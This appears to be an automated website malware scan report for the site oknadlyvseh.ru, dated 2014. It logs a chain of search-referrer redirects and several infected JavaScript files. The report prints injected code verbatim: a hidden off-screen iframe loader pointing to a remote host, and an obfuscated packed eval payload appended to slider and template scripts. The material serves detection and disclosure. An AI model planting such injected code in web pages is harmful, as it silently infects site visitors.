Malicious/Suspicious Redirects
| Request | Server response | Status |
URL: http://oknadlyvseh.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: oknadlyvseh.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 28 Jul 2014 20:21:16 GMT Location: http://www.totalcarsolution.com/sctcom/cgi-bin/1.php Server: Apache/1.3.42 (Unix) mod_fastcgi/2.4.6 Content-Type: text/html X-Powered-By: PHP/5.2.17 | malicious |
URL: http://www.totalcarsolution.com/sctcom/cgi-bin/1.php (imitation of visitor from search engine) GET /sctcom/cgi-bin/1.php HTTP/1.1 Host: www.totalcarsolution.com Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 28 Jul 2014 20:21:19 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
URL: http://www.csra.de/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: www.csra.de Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 28 Jul 2014 20:21:20 GMT Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.30 | malicious |
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php (imitation of visitor from search engine) GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1 Host: jbtconsultinggroup.com Referer: http://www.google.com/search?q=redirect+check4 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Mon, 28 Jul 2014 20:21:21 GMT Location: http://google.ru Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
| Request | Server response | Status |
http://oknadlyvseh.ru/ | 200 OK Content-Length: 25744 Content-Type: text/html | clean |
http://oknadlyvseh.ru/media/system/js/caption.js | 403 Forbidden Content-Length: 295 Content-Type: text/html | clean |
http://oknadlyvseh.ru/test404page.js | 404 Not Found Content-Length: 279 Content-Type: text/html | clean |
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://oknadlyvseh.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js | 200 OK Content-Length: 286 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) if (typeof(jQuery) != 'undefined') window.jQueryNivoSlider = jQuery.noConflict();;document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://tkhaap.pcanywhere.net/9c020caf21567078541cfc09c46c53ba.sys?11"></iframe>'); Antivirus reports:
| ||
http://oknadlyvseh.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js | 200 OK Content-Length: 9774 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) ;eval(function(p,a,c,k,e,r){e=function(c){return(c<62?'':e(parseInt(c/62)))+((c=c%62)<36?c.toString(36):String.fromCharCode(c+29))};if('0'.replace(0,e)==0){while(c--)r[e(c)]=k[c];k=[function(e){return r[e]||e}];e=function(){return'\\w{1,2}'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(7($){6 P=7(A,B){6 C=$.extend({},$.fn.22.2s,B);7 D(a){17 a?a.replace(/ /g,\'%20\'):\'\'};6 E={V:0,14:\'\',1q:0,R:\'\',1r:Y,23:Y,1v:Y,2t:Y};6 F=$(A);F.1g(\'9:1B\',E);F. Antivirus reports:
| ||
http://oknadlyvseh.ru/templates/jm_tmpl4/lib/scripts/template_scripts.js | 200 OK Content-Length: 2418 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) window.addEvent("domready",function(){ Fx.Height = Fx.Style.extend({initialize: function(el, options){this.parent(el, 'height', options);this.element.setStyle('overflow', 'hidden');},toggle: function(){return (this.element.offsetHeight > 0) ? this.custom(this.element.offsetHeight, 0) : this.custom(0, this.element.scrollHeight);},show: function(){return this.set(this.element.scrollHeight);}}); Fx.Opacity = Fx.Style.extend({initialize: function(el, op }); } }); function changeStyle(style){ var file = template_path+'/css/style'+style+'.css'; new Asset.css(file); new Cookie.set('gk20_style',style,{duration: 200,path: "/"}); actual_style = style; };document.write('<iframe width="55" height="55" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://tkhaap.pcanywhere.net/9c020caf21567078541cfc09c46c53ba.sys?11"></iframe>'); Antivirus reports:
| ||
http://oknadlyvseh.ru/templates/jm_tmpl4/lib/scripts/menu.php?style=standard&width=1&height=1&opacity=1&animation=1&speed=180 | 200 OK Content-Length: 256 Content-Type: text/javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oknadlyvseh.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://oknadlyvseh.ru/
Result: oknadlyvseh.ru is not infected or malware details are not published yet.
Result: oknadlyvseh.ru is not infected or malware details are not published yet.